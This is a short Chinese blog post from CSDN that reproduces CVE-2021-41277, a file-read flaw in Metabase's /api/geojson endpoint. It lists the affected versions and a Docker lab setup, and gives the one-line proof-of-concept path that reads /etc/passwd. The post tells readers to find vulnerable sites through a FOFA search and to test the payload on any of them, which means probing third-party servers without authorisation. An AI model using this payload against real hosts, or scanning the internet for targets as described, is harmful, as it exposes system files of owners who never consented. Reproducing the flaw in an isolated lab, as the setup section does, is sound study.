CVE-2021-41277(metebase信息泄漏漏洞复现)

本文介绍了开源BI工具Metabase的漏洞情况,重点关注了版本号为0.40.5之前的和1.0.0到1.40.5之间的版本。通过Docker在Kali Linux上搭建了Metabase环境,并展示了如何复现漏洞,使用POC验证了/api/geojson接口的安全问题,该接口允许通过URL参数读取系统文件,例如/etc/passwd。
摘要由CSDN通过智能技术生成

0x00 前置知识

1、metebase

         metabase是一款开源的BI分析工具,开发语言clojure+React为主、也有高阶的收费版。 官网:Metabase | Business Intelligence, Dashboards, and Data Visualization 可以利用Metabase进行数据分析,数据可视化,报表生成等。

Metabase介绍_Sshine___的博客-CSDN博客_metabase

2、影响版本:

        metabase version < 0.40.5
        metabase version >= 1.0.0, < 1.40.5

0x01 工具

1、docker

kali下对Docker的详细安装_涂寐的博客-CSDN博客_kali安装docker

2、kali

0x02 漏洞复现

1、fofa语法搜索

2、环境搭建

1)创建并运行容器

 

2)复现 

(1)设置一下metebase

(2)随便在刚刚fofa找到的有metebase漏洞的网址,验证poc

/api/geojson?url=file:/etc/passwd

 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

haoaaao

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值